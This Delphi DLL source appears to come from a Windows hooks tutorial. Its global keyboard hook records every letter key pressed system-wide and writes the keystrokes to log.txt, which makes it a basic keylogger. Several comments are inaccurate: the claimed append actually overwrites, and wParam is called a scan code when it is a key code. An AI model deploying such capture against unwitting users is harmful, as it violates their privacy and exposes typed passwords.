library HookDll;


uses
  SysUtils,
  Classes,windows;

var CurrentHook: HHook;
    KeyArray: array[0..19] of byte;
    KeyArrayPtr: integer;
    CurFile: file of byte;
{
GlobalKeyboardHook
------------
This is the hook procedure to be loaded from hooks.exe when you
try and create a global hook. It is similar in structure to that defined
in hook.dpr for creating a local hook, but this time it does not beep!
Instead it stores each key pressed in an array of bytes (20 long). Whenever
this array gets full, it writes it to a file, log.txt and starts again.
}
function GlobalKeyBoardHook(code: integer; wParam: word; lParam: longword): longword; stdcall;
begin
    if code<0 then begin  //if code is <0 your keyboard hook should always run CallNextHookEx instantly and
       GlobalKeyBoardHook:=CallNextHookEx(CurrentHook,code,wParam,lparam); //then return the value from it.
       Exit;
    end;
    //firstly, is the key being pressed, and is it between A and Z
    //note that wParam contains the scan code of the key (which for a-z is the same as the ascii value)
    if ((lParam and KF_UP)=0) and (wParam>=65) and (wParam<=90) then begin
         //store the keycode in the list of keys pressed and increase the pointer
         KeyArray[KeyArrayPtr]:=wParam;
         KeyArrayPtr:=KeyArrayPtr+1;
         //if 20 keys have been recorded, save them to log.txt and start again
         if KeyArrayPtr>19 then begin
            assignfile(CurFile,'log.txt');
            if fileexists('log.txt')=false then rewrite(CurFile) else reset(CurFile); //if log.txt exists, add to it, otherwise recreate it
            blockwrite(CurFile,KeyArray[0],20);
            closefile(CurFile);
            KeyArrayPtr:=0;
         end;
    end;
    CallNextHookEx(CurrentHook,code,wParam,lparam);  //call the next hook proc if there is one
    GlobalKeyBoardHook:=0; //if GlobalKeyBoardHook returns a non-zero value, the window that should get
                     //the keyboard message doesnt get it.
    Exit;
end;

{
SetHookHandle
-------------
This procedure is called by hooks.exe simply to 'inform' the dll of
the handle generated when creating the hook. This is required
if the hook procedure is to call CallNextHookEx. It also resets the
position in the key list to 0.

}
procedure SetHookHandle(HookHandle: HHook); stdcall;
begin
    CurrentHook:=HookHandle;
    KeyArrayPtr:=0;
end;

exports GlobalKeyBoardHook index 1,
        SetHookHandle index 2;
begin

end.
